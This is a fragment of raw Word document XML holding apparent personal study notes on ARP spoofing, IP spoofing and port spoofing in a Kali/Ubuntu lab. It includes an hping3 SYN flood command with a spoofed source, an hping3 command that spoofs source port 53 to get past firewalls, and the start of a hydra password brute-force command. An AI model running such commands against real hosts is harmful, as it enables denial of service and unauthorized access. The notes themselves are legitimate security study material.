        <w:t>Kali</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DD365EC" w14:textId="77777777" w:rsidR="005E4BCC" w:rsidRPr="005E4BCC" w:rsidRDefault="005E4BCC" w:rsidP="005E4BCC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005E4BCC">
        <w:t xml:space="preserve">Gateway replies to victim → it goes through </w:t>
      </w:r>
      <w:r w:rsidRPr="005E4BCC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Kali</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31FA1D2D" w14:textId="77777777" w:rsidR="005E4BCC" w:rsidRDefault="005E4BCC" w:rsidP="005E4BCC">
      <w:r w:rsidRPr="005E4BCC">
        <w:t xml:space="preserve">You are in the </w:t>
      </w:r>
      <w:r w:rsidRPr="005E4BCC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>middle</w:t>
      </w:r>
      <w:r w:rsidRPr="005E4BCC">
        <w:t xml:space="preserve"> of every message.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1547FA82" w14:textId="77777777" w:rsidR="005E4BCC" w:rsidRDefault="005E4BCC" w:rsidP="005E4BCC"/>
    <w:p w14:paraId="1EEC6698" w14:textId="2FCEB066" w:rsidR="005E4BCC" w:rsidRDefault="005E4BCC" w:rsidP="005E4BCC">
      <w:r>
        <w:t>--------------------------------------------------------------------------------------------------------------------------------------</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F2DB516" w14:textId="77777777" w:rsidR="005E4BCC" w:rsidRDefault="005E4BCC" w:rsidP="005E4BCC"/>
    <w:p w14:paraId="56F831FA" w14:textId="5BB0D3BB" w:rsidR="005E4BCC" w:rsidRDefault="005E4BCC" w:rsidP="005E4BCC">
      <w:r>
        <w:t xml:space="preserve">Ip spoofing </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7353558A" w14:textId="77777777" w:rsidR="005E4BCC" w:rsidRDefault="005E4BCC" w:rsidP="005E4BCC">
      <w:r>
        <w:t>IP spoofing is the creation of Internet Protocol (IP) packets which have a modified source address in</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71EE7848" w14:textId="566C3D9E" w:rsidR="005E4BCC" w:rsidRDefault="005E4BCC" w:rsidP="005E4BCC">
      <w:r>
        <w:t>order to either hide the identity of the sender, to impersonate another computer system, or both. It is</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>a technique often used by bad actors to invoke DDoS attacks against a target device or the</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="783DFE1D" w14:textId="6489570B" w:rsidR="005E4BCC" w:rsidRPr="005E4BCC" w:rsidRDefault="005E4BCC" w:rsidP="005E4BCC">
      <w:r>
        <w:t>surrounding infrastructure.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C1E8B77" w14:textId="77777777" w:rsidR="005E4BCC" w:rsidRDefault="005E4BCC" w:rsidP="00216EAA"/>
    <w:p w14:paraId="2BB19717" w14:textId="77777777" w:rsidR="005E4BCC" w:rsidRDefault="005E4BCC" w:rsidP="00216EAA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9"/>
        <w:gridCol w:w="1859"/>
        <w:gridCol w:w="3155"/>
      </w:tblGrid>
      <w:tr w:rsidR="00C51745" w:rsidRPr="00C51745" w14:paraId="457A5AF4" w14:textId="77777777" w:rsidTr="00C5174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4973DF" w14:textId="77777777" w:rsidR="00C51745" w:rsidRPr="00C51745" w:rsidRDefault="00C51745" w:rsidP="00C51745">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C51745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3EF1AFD" w14:textId="77777777" w:rsidR="00C51745" w:rsidRPr="00C51745" w:rsidRDefault="00C51745" w:rsidP="00C51745">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C51745">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>ARP Spoofing</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="46EB21BE" w14:textId="77777777" w:rsidR="00C51745" w:rsidRPr="00C51745" w:rsidRDefault="00C51745" w:rsidP="00C51745">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C51745">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>IP Spoofing</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C51745" w:rsidRPr="00C51745" w14:paraId="066E06BE" w14:textId="77777777" w:rsidTr="00C517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000FD2" w14:textId="77777777" w:rsidR="00C51745" w:rsidRPr="00C51745" w:rsidRDefault="00C51745" w:rsidP="00C51745">
            <w:r w:rsidRPr="00C51745">
              <w:t>Targets</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="576BA236" w14:textId="77777777" w:rsidR="00C51745" w:rsidRPr="00C51745" w:rsidRDefault="00C51745" w:rsidP="00C51745">
            <w:r w:rsidRPr="00C51745">
              <w:t>LAN / Local network</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="573AD0ED" w14:textId="77777777" w:rsidR="00C51745" w:rsidRPr="00C51745" w:rsidRDefault="00C51745" w:rsidP="00C51745">
            <w:r w:rsidRPr="00C51745">
              <w:t>Any network (LAN or internet)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C51745" w:rsidRPr="00C51745" w14:paraId="62C596C5" w14:textId="77777777" w:rsidTr="00C517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05570D" w14:textId="77777777" w:rsidR="00C51745" w:rsidRPr="00C51745" w:rsidRDefault="00C51745" w:rsidP="00C51745">
            <w:r w:rsidRPr="00C51745">
              <w:t>Goal</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="55E9781F" w14:textId="77777777" w:rsidR="00C51745" w:rsidRPr="00C51745" w:rsidRDefault="00C51745" w:rsidP="00C51745">
            <w:r w:rsidRPr="00C51745">
              <w:t>MITM (intercept)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="78B21466" w14:textId="77777777" w:rsidR="00C51745" w:rsidRPr="00C51745" w:rsidRDefault="00C51745" w:rsidP="00C51745">
            <w:r w:rsidRPr="00C51745">
              <w:t>Impersonate another machine</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C51745" w:rsidRPr="00C51745" w14:paraId="0915A7DA" w14:textId="77777777" w:rsidTr="00C517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35FE60" w14:textId="77777777" w:rsidR="00C51745" w:rsidRPr="00C51745" w:rsidRDefault="00C51745" w:rsidP="00C51745">
            <w:r w:rsidRPr="00C51745">
              <w:t>Protocol Spoofed</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1F6C778D" w14:textId="77777777" w:rsidR="00C51745" w:rsidRPr="00C51745" w:rsidRDefault="00C51745" w:rsidP="00C51745">
            <w:r w:rsidRPr="00C51745">
              <w:t>ARP (Layer 2)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1F332B6D" w14:textId="77777777" w:rsidR="00C51745" w:rsidRPr="00C51745" w:rsidRDefault="00C51745" w:rsidP="00C51745">
            <w:r w:rsidRPr="00C51745">
              <w:t>IP Header (Layer 3)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C51745" w:rsidRPr="00C51745" w14:paraId="019FA52E" w14:textId="77777777" w:rsidTr="00C517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D512F7" w14:textId="77777777" w:rsidR="00C51745" w:rsidRPr="00C51745" w:rsidRDefault="00C51745" w:rsidP="00C51745">
            <w:r w:rsidRPr="00C51745">
              <w:t>Responses back?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6F454D1E" w14:textId="77777777" w:rsidR="00C51745" w:rsidRPr="00C51745" w:rsidRDefault="00C51745" w:rsidP="00C51745">
            <w:r w:rsidRPr="00C51745">
              <w:t>Yes (you see replies)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="50AC6B5D" w14:textId="77777777" w:rsidR="00C51745" w:rsidRPr="00C51745" w:rsidRDefault="00C51745" w:rsidP="00C51745">
            <w:r w:rsidRPr="00C51745">
              <w:t>No (spoofed IP doesn’t get replies)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6DB70BE8" w14:textId="67BC1D97" w:rsidR="005E4BCC" w:rsidRDefault="00C51745" w:rsidP="00216EAA">
      <w:r w:rsidRPr="00C51745">
        <w:t xml:space="preserve">You send a fake packet </w:t>
      </w:r>
      <w:r w:rsidRPr="00C51745">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>pretending to be someone else</w:t>
      </w:r>
      <w:r w:rsidRPr="00C51745">
        <w:t xml:space="preserve">, but replies go to the </w:t>
      </w:r>
      <w:r w:rsidRPr="00C51745">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>real IP</w:t>
      </w:r>
      <w:r w:rsidRPr="00C51745">
        <w:t>, not you. That’s why IP spoofing isn't typically used for MITM.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34DBCE6D" w14:textId="77777777" w:rsidR="00E7503C" w:rsidRDefault="00E7503C" w:rsidP="00216EAA"/>
    <w:p w14:paraId="58B532B0" w14:textId="77777777" w:rsidR="00E7503C" w:rsidRPr="00E7503C" w:rsidRDefault="00E7503C" w:rsidP="00E7503C">
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00E7503C">
        <w:t>  Kali</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00E7503C">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E7503C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>sends a ping</w:t>
      </w:r>
      <w:r w:rsidRPr="00E7503C">
        <w:t xml:space="preserve"> to 192.168.146.130 (Ubuntu)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A667DA1" w14:textId="77777777" w:rsidR="00E7503C" w:rsidRPr="00E7503C" w:rsidRDefault="00E7503C" w:rsidP="00E7503C">
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00E7503C">
        <w:t>  The</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00E7503C">
        <w:t xml:space="preserve"> ping </w:t>
      </w:r>
      <w:r w:rsidRPr="00E7503C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>claims to be from</w:t>
      </w:r>
      <w:r w:rsidRPr="00E7503C">
        <w:t xml:space="preserve"> 192.168.146.200 (spoofed)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08EE4E5A" w14:textId="77777777" w:rsidR="00E7503C" w:rsidRPr="00E7503C" w:rsidRDefault="00E7503C" w:rsidP="00E7503C">
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00E7503C">
        <w:t>  Victim</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00E7503C">
        <w:t xml:space="preserve"> sees a ping </w:t>
      </w:r>
      <w:r w:rsidRPr="00E7503C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>from 192.168.146.200</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39408366" w14:textId="77777777" w:rsidR="00E7503C" w:rsidRPr="00E7503C" w:rsidRDefault="00E7503C" w:rsidP="00E7503C">
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00E7503C">
        <w:t>  Victim</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00E7503C">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E7503C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>replies to 192.168.146.200</w:t>
      </w:r>
      <w:r w:rsidRPr="00E7503C">
        <w:t>, not to Kali</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F239BFC" w14:textId="77777777" w:rsidR="00E7503C" w:rsidRDefault="00E7503C" w:rsidP="00216EAA"/>
    <w:p w14:paraId="4F66A260" w14:textId="30E1BCE4" w:rsidR="007E52B2" w:rsidRDefault="007E52B2" w:rsidP="00216EAA">
      <w:r w:rsidRPr="007E52B2">
        <w:t xml:space="preserve">hping3 --flood -p 80 192.168.1.102 -S –spoof </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>spoofed_ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="40722452" w14:textId="77777777" w:rsidR="00A630B5" w:rsidRDefault="00A630B5" w:rsidP="00216EAA"/>
    <w:p w14:paraId="6937C6D2" w14:textId="77777777" w:rsidR="00A630B5" w:rsidRDefault="00A630B5" w:rsidP="00216EAA"/>
    <w:p w14:paraId="76EB7F87" w14:textId="19646293" w:rsidR="00042679" w:rsidRDefault="00A630B5" w:rsidP="00216EAA">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> apt install </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>hexedit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4D13B98D" w14:textId="77D8762A" w:rsidR="00A630B5" w:rsidRDefault="00A630B5" w:rsidP="00216EAA">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>hexedit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> file name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="167D538E" w14:textId="77777777" w:rsidR="00A630B5" w:rsidRDefault="00A630B5" w:rsidP="00216EAA"/>
    <w:p w14:paraId="1D7ECFAD" w14:textId="77777777" w:rsidR="00A630B5" w:rsidRDefault="00A630B5" w:rsidP="00216EAA"/>
    <w:p w14:paraId="6F0DC8C0" w14:textId="77777777" w:rsidR="00A630B5" w:rsidRDefault="00A630B5" w:rsidP="00216EAA"/>
    <w:p w14:paraId="62CDBA76" w14:textId="5E687077" w:rsidR="00042679" w:rsidRDefault="00042679" w:rsidP="00216EAA">
      <w:r>
        <w:t>port spoofing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E0A2545" w14:textId="77777777" w:rsidR="00042679" w:rsidRDefault="00042679" w:rsidP="00216EAA"/>
    <w:p w14:paraId="63CEF6BA" w14:textId="77777777" w:rsidR="00042679" w:rsidRPr="00042679" w:rsidRDefault="00042679" w:rsidP="00042679">
      <w:r w:rsidRPr="00042679">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Port spoofing</w:t>
      </w:r>
      <w:r w:rsidRPr="00042679">
        <w:t xml:space="preserve"> usually refers to </w:t>
      </w:r>
      <w:r w:rsidRPr="00042679">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>sending packets with a fake source port</w:t>
      </w:r>
      <w:r w:rsidRPr="00042679">
        <w:t xml:space="preserve"> (or targeting specific destination ports) to:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15DC336F" w14:textId="77777777" w:rsidR="00042679" w:rsidRPr="00042679" w:rsidRDefault="00042679" w:rsidP="00042679">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00042679">
        <w:t>Bypass firewalls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BADF873" w14:textId="77777777" w:rsidR="00042679" w:rsidRPr="00042679" w:rsidRDefault="00042679" w:rsidP="00042679">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00042679">
        <w:t>Confuse intrusion detection systems</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C21266D" w14:textId="77777777" w:rsidR="00042679" w:rsidRPr="00042679" w:rsidRDefault="00042679" w:rsidP="00042679">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00042679">
        <w:t>Simulate trusted services (e.g. DNS, HTTP)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ECBE47C" w14:textId="77777777" w:rsidR="00042679" w:rsidRPr="00042679" w:rsidRDefault="00042679" w:rsidP="00042679">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00042679">
        <w:t>Evade filters or logs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41E44CEA" w14:textId="77777777" w:rsidR="007E52B2" w:rsidRDefault="007E52B2" w:rsidP="00216EAA"/>
    <w:p w14:paraId="442ED9FE" w14:textId="5FA4FDC6" w:rsidR="00042679" w:rsidRDefault="00042679" w:rsidP="00216EAA">
      <w:r w:rsidRPr="00042679">
        <w:t xml:space="preserve">Pretend you're sending </w:t>
      </w:r>
      <w:r w:rsidRPr="00042679">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>from port 53 (DNS)</w:t>
      </w:r>
      <w:r w:rsidRPr="00042679">
        <w:t xml:space="preserve"> (some firewalls trust DNS).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0"/>
        <w:gridCol w:w="3542"/>
      </w:tblGrid>
      <w:tr w:rsidR="00042679" w:rsidRPr="00042679" w14:paraId="00E7AB34" w14:textId="77777777" w:rsidTr="0004267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5D2F0C" w14:textId="77777777" w:rsidR="00042679" w:rsidRPr="00042679" w:rsidRDefault="00042679" w:rsidP="00042679">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00042679">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Flag</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5CE2B932" w14:textId="77777777" w:rsidR="00042679" w:rsidRPr="00042679" w:rsidRDefault="00042679" w:rsidP="00042679">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00042679">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00042679" w:rsidRPr="00042679" w14:paraId="35D111CD" w14:textId="77777777" w:rsidTr="000426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9F9CEA" w14:textId="77777777" w:rsidR="00042679" w:rsidRPr="00042679" w:rsidRDefault="00042679" w:rsidP="00042679">
            <w:r w:rsidRPr="00042679">
              <w:t>-S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5053B199" w14:textId="77777777" w:rsidR="00042679" w:rsidRPr="00042679" w:rsidRDefault="00042679" w:rsidP="00042679">
            <w:r w:rsidRPr="00042679">
              <w:t>Send SYN packet (TCP handshake start)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00042679" w:rsidRPr="00042679" w14:paraId="2CCC0A9D" w14:textId="77777777" w:rsidTr="000426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A4A96F" w14:textId="77777777" w:rsidR="00042679" w:rsidRPr="00042679" w:rsidRDefault="00042679" w:rsidP="00042679">
            <w:r w:rsidRPr="00042679">
              <w:t>-p 80</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3804D780" w14:textId="77777777" w:rsidR="00042679" w:rsidRPr="00042679" w:rsidRDefault="00042679" w:rsidP="00042679">
            <w:r w:rsidRPr="00042679">
              <w:t>Destination port (web service)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00042679" w:rsidRPr="00042679" w14:paraId="261B8163" w14:textId="77777777" w:rsidTr="000426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BFFCF5" w14:textId="77777777" w:rsidR="00042679" w:rsidRPr="00042679" w:rsidRDefault="00042679" w:rsidP="00042679">
            <w:r w:rsidRPr="00042679">
              <w:t>--</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00042679">
              <w:t>baseport</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00042679">
              <w:t xml:space="preserve"> 53</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="22580744" w14:textId="77777777" w:rsidR="00042679" w:rsidRPr="00042679" w:rsidRDefault="00042679" w:rsidP="00042679">
            <w:r w:rsidRPr="00042679">
              <w:t xml:space="preserve">Spoof </w:t>
            </w:r>
            <w:r w:rsidRPr="00042679">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>source port</w:t>
            </w:r>
            <w:r w:rsidRPr="00042679">
              <w:t xml:space="preserve"> as 53</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00042679" w:rsidRPr="00042679" w14:paraId="6FEC78C5" w14:textId="77777777" w:rsidTr="000426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3F89F6" w14:textId="77777777" w:rsidR="00042679" w:rsidRPr="00042679" w:rsidRDefault="00042679" w:rsidP="00042679">
            <w:r w:rsidRPr="00042679">
              <w:t>192.168.146.130</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="089C516D" w14:textId="77777777" w:rsidR="00042679" w:rsidRPr="00042679" w:rsidRDefault="00042679" w:rsidP="00042679">
            <w:r w:rsidRPr="00042679">
              <w:t>Victim IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1C7FFF68" w14:textId="77777777" w:rsidR="00042679" w:rsidRDefault="00042679" w:rsidP="00216EAA">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="59049269" w14:textId="2D8D303A" w:rsidR="00042679" w:rsidRPr="00042679" w:rsidRDefault="00042679" w:rsidP="00216EAA">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00042679">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00042679">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> hping3 -S -p 80 --</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00042679">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>baseport</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00042679">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> 53 192.168.146.130</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15FA7581" w14:textId="77777777" w:rsidR="007E52B2" w:rsidRDefault="007E52B2" w:rsidP="00216EAA"/>
    <w:p w14:paraId="4BE66441" w14:textId="53663278" w:rsidR="00042679" w:rsidRDefault="00042679" w:rsidP="00216EAA">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00042679">
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00042679">
        <w:t xml:space="preserve"> apt install </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00042679">
        <w:t>wireshark</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00042679">
        <w:t xml:space="preserve"> -y</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="466947BC" w14:textId="77777777" w:rsidR="00042679" w:rsidRDefault="00042679" w:rsidP="00216EAA"/>
    <w:p w14:paraId="0CBCE8B3" w14:textId="12A9EA3B" w:rsidR="00042679" w:rsidRDefault="00AD4860" w:rsidP="00216EAA">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AD4860">
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AD4860">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AD4860">
        <w:t>usermod</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AD4860">
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AD4860">
        <w:t>aG</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AD4860">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AD4860">
        <w:t>wireshark</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AD4860">
        <w:t xml:space="preserve"> $USER</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55924254" w14:textId="50983551" w:rsidR="00AD4860" w:rsidRDefault="00AD4860" w:rsidP="00216EAA">
      <w:r>
        <w:t>logout and restart</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60ED8B64" w14:textId="77777777" w:rsidR="009B2466" w:rsidRDefault="009B2466" w:rsidP="00216EAA"/>
    <w:p w14:paraId="490BD6A4" w14:textId="77777777" w:rsidR="009B2466" w:rsidRDefault="009B2466" w:rsidP="00216EAA"/>
    <w:p w14:paraId="47911504" w14:textId="50D17B2D" w:rsidR="009B2466" w:rsidRDefault="009B2466" w:rsidP="00216EAA">
      <w:r>
        <w:t>hydra</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AEB2F88" w14:textId="18A97E25" w:rsidR="009B2466" w:rsidRDefault="009B2466" w:rsidP="00216EAA">
      <w:r w:rsidRPr="009B2466">
        <w:t xml:space="preserve">hydra -l </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009B2466">
        <w:t>divyesh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009B2466">
        <w:t xml:space="preserve"> -P '/home/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009B2466">
        <w:t>divyesh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009B2466">
        <w:t xml:space="preserve">/Desktop/message.txt' </w:t>
      </w:r>
      <w:hyperlink r:id="rId5" w:history="1">
